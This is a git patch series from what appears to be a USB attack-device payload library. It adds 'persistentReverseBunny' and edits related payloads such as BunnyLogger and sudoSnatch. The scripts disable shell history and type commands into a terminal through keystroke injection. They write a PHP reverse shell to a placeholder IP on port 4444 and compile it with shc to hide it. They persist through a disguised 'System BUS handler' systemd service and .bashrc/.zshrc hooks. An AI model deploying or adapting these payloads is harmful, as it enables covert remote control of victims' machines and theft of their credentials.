From bd4ec90d04bc3e98d46ceddc5b1b5ad48a1b70e3 Mon Sep 17 00:00:00 2001 From: drapl0n <87269662+drapl0n@users.noreply.github.com> Date: Fri, 15 Apr 2022 02:39:21 +0530 Subject: [PATCH 1/5] Changing systemd Unit (#514) * Uploaded BunnyLogger * uploading payload intel * Create README.md * Update README.md * uploaded LinuxPreter * uploaded FileRipper Faster executing version * Update README.md * fixing typo * uploaded sudoSnatch * Update README.md * deleting sudoSnatch * uploading payload * Delete payload.sh * Delete shell * Delete systemBus * Delete camPeek directory * Update payload.sh * Update payload.sh * Delete payloads/library/execution/FileRipper directory * Update payload.sh * Update payload.sh * Update payload.sh * Update payload.sh --- payloads/library/credentials/BunnyLogger/payload.sh | 4 ++-- payloads/library/credentials/sudoSnatch/payload.sh | 4 ++-- payloads/library/execution/ScreenGrab/screenGrab/payload.sh | 2 +- payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh | 2 +- payloads/library/execution/camPeek/camPeek/payload.sh | 2 +- payloads/library/remote_access/LinuxPreter/payload.sh | 2 +- 6 files changed, 8 insertions(+), 8 deletions(-) diff --git a/payloads/library/credentials/BunnyLogger/payload.sh b/payloads/library/credentials/BunnyLogger/payload.sh index 90d1ea36..fab26f88 100644 --- a/payloads/library/credentials/BunnyLogger/payload.sh +++ b/payloads/library/credentials/BunnyLogger/payload.sh @@ -11,10 +11,10 @@ chmod +x /var/tmp/.system/xinput echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus chmod +x /var/tmp/.system/systemBus mkdir -p ~/.config/systemd/user -echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot chmod +x /var/tmp/.system/reboot -echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service +echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service systemctl --user daemon-reload systemctl --user enable --now systemBUS.service systemctl --user start --now systemBUS.service diff --git a/payloads/library/credentials/sudoSnatch/payload.sh b/payloads/library/credentials/sudoSnatch/payload.sh index a11c2654..56eb0443 100644 --- a/payloads/library/credentials/sudoSnatch/payload.sh +++ b/payloads/library/credentials/sudoSnatch/payload.sh @@ -10,10 +10,10 @@ touch /var/tmp/.system/sysLog echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus chmod +x /var/tmp/.system/systemBus mkdir -p ~/.config/systemd/user -echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot chmod +x /var/tmp/.system/reboot -echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service +echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service systemctl --user daemon-reload systemctl --user enable --now systemBUS.service systemctl --user start --now systemBUS.service diff --git a/payloads/library/execution/ScreenGrab/screenGrab/payload.sh b/payloads/library/execution/ScreenGrab/screenGrab/payload.sh index ea0ff7a6..7c0eec75 100644 --- a/payloads/library/execution/ScreenGrab/screenGrab/payload.sh +++ b/payloads/library/execution/ScreenGrab/screenGrab/payload.sh @@ -10,7 +10,7 @@ mkdir /var/tmp/.system/sysLog cp -r $mntt/payloads/library/screenGrab/systemBus /var/tmp/.system/systemBus chmod +x /var/tmp/.system/systemBus mkdir -p ~/.config/systemd/user -echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service systemctl --user daemon-reload systemctl --user enable --now systemBUS.service systemctl --user start --now systemBUS.service diff --git a/payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh b/payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh index eeb3f5f8..e7b34aed 100644 --- a/payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh +++ b/payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh @@ -6,7 +6,7 @@ ip=$(ip -o -f inet addr show | awk '/scope global/ {print $4}') open=$(nmap -p 80 $ip -q -oG - | grep open | awk '{print $2}' | awk '{printf("%s ",$0)} END { printf "\n" }') mkdir /var/tmp/.system/ mkdir -p ~/.config/systemd/user -echo -e "[Unit]\nDescription= System IO handler.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/sysHandler -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/libSystemIO.service +echo -e "[Unit]\nDescription= System IO handler.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/sysHandler -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/libSystemIO.service cp -r $mntt/payloads/library/bunnyDOS/systemIO /var/tmp/.system/ chmod +x /var/tmp/.system/systemIO for i in $open diff --git a/payloads/library/execution/camPeek/camPeek/payload.sh b/payloads/library/execution/camPeek/camPeek/payload.sh index 3759ce12..84d9f4d0 100644 --- a/payloads/library/execution/camPeek/camPeek/payload.sh +++ b/payloads/library/execution/camPeek/camPeek/payload.sh @@ -10,7 +10,7 @@ mkdir /var/tmp/.system/sysLog cp -r $mntt/payloads/library/camPeek/systemBus /var/tmp/.system/systemBus chmod +x /var/tmp/.system/systemBus mkdir -p ~/.config/systemd/user -echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service systemctl --user daemon-reload systemctl --user enable --now systemBUS.service systemctl --user start --now systemBUS.service diff --git a/payloads/library/remote_access/LinuxPreter/payload.sh b/payloads/library/remote_access/LinuxPreter/payload.sh index cfecd2cf..7bdb73ab 100644 --- a/payloads/library/remote_access/LinuxPreter/payload.sh +++ b/payloads/library/remote_access/LinuxPreter/payload.sh @@ -6,7 +6,7 @@ cp -r $mntt/tools/sysHandle.bin /var/tmp/.system chmod +x /var/tmp/.system/sysHandle.bin mkdir -p ~/.config/systemd/user/ systemctl --user start systemPer.service -echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/var/tmp/.system/./sysHandle.bin -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemPer.service +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/var/tmp/.system/./sysHandle.bin -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemPer.service echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemPer.service \" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemPer.service\" >> ~/.bashrc\nfi" > ~/tmmmp chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit From 797cf561d5b9b0809910c346914bc0ac2eb9d43c Mon Sep 17 00:00:00 2001 From: drapl0n <87269662+drapl0n@users.noreply.github.com> Date: Fri, 15 Apr 2022 02:40:51 +0530 Subject: [PATCH 2/5] persistentReverseBunny (#515) * persistentReverseBunny Added obfuscation layer by completely encoding reverse shell mechanism. * fixing typo * adding payload --- .../persistentReverseBunny/README.md | 36 +++++++++++++ .../persistentReverseBunny/payload.txt | 51 ++++++++++++++++++ .../persistentReverseBunny/payload.sh | 18 +++++++ .../persistentReverseBunny/shc | Bin 0 -> 68128 bytes 4 files changed, 105 insertions(+) create mode 100644 payloads/library/remote_access/persistentReverseBunny/README.md create mode 100644 payloads/library/remote_access/persistentReverseBunny/payload.txt create mode 100644 payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/payload.sh create mode 100644 payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/shc diff --git a/payloads/library/remote_access/persistentReverseBunny/README.md b/payloads/library/remote_access/persistentReverseBunny/README.md new file mode 100644 index 00000000..e8ea4c13 --- /dev/null +++ b/payloads/library/remote_access/persistentReverseBunny/README.md @@ -0,0 +1,36 @@ +## About: +* Title: persistentReverseBunny +* Description: persistentReverseBunny provides you persistent reverse shell remotely/locally. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Remote Access +* Target: Unix-like operating systems with systemd. +* Attackmodes: HID, STORAGE + +## persistentReverseBunny: provides you persistent encoded reverse shell remotely/locally within 15 secs. + +### Workflow: +Keeping tracks clear by disabling and deleting history. Creating hidden directory to store payload. Creating payload mechanism and compiling it for obfuscation, which checks whether internet is connected to the target system, if yes then it creates reverse shell to attackers machine. Creating non-root systemd service to keep payload running in background. Enabling service. Autostarting service on trigger of terminal emulator or shell. + +### Algorithm: +1. Stop storing history, this helps to keep tracks clear from begining. +2. Creating reverse shell. +3. Creating non-root systemd service. +4. Enabling service. +5. Starting service on trigger of firing terminal emulator/shell. + +### LED Status: +* `SETUP` : MAGENTA +* `ATTACK` : YELLOW +* `FINISH` : GREEN + +### Directory Structure of payload components: +| FileName | Directory | +| ----------------------- | ----------------------------- | +| payload.txt | /payloads/switch1/ | +| persistentReverseBunny/ | /payloads/libray/ | + +### Note: +* Change ip address(0.0.0.0) and port number(4444) to your server's ip address and port number in `reversePersistentBunny/payload.sh` on line `6`. +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/remote_access/persistentReverseBunny/payload.txt b/payloads/library/remote_access/persistentReverseBunny/payload.txt new file mode 100644 index 00000000..de367d14 --- /dev/null +++ b/payloads/library/remote_access/persistentReverseBunny/payload.txt @@ -0,0 +1,51 @@ +# Description: persistentReverseBunny provides you persistent and ofuscated reverse shell remotely/locally within 15 secs. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Remote Access +# Target: Unix-like operating systems with systemd. +# Attackmodes: HID, Storage + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +Q STRING cp -r '$mntt'/payloads/library/persistentReverseBunny/payload.sh /tmp/ +Q ENTER +Q STRING chmod +x /tmp/payload.sh +Q ENTER +Q STRING /tmp/./payload.sh \& +Q ENTER +Q STRING disown +Q ENTER +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH diff --git a/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/payload.sh b/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/payload.sh new file mode 100644 index 00000000..edd304f3 --- /dev/null +++ b/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/payload.sh @@ -0,0 +1,18 @@ +#!/bin/bash +lol=$(lsblk | grep 1.8G) +disk=$(echo $lol | awk '{print $1}') +mntt=$(lsblk | grep $disk | awk '{print $7}') +mkdir /var/tmp/.system/ +echo -e "#!"/bin/bash"\nwhile :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/bin/sh -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/pop +cp -r $mntt/payloads/library/persistentReverseBunny/shc /var/tmp/.system/ +chmod +x /var/tmp/.system/shc +/var/tmp/.system/./shc -f /var/tmp/.system/pop -o /var/tmp/.system/systemBus +chmod +x /var/tmp/.system/systemBus +rm /var/tmp/.system/pop* +mkdir -p ~/.config/systemd/user +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service +systemctl --user daemon-reload +systemctl --user enable --now systemBUS.service +systemctl --user start --now systemBUS.service +echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.bashrc\nfi\n\n" > ~/tmmmp +chmod +x ~/tmmmp && ~/./tmmmp && rm ~/tmmmp && rm /tmp/payload.sh && rm /var/tmp/.system/shc diff --git a/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/shc b/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/shc new file mode 100644 index 0000000000000000000000000000000000000000..8e7c686cb24cf609141927e625abb36a720e2c0b GIT binary patch literal 68128 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 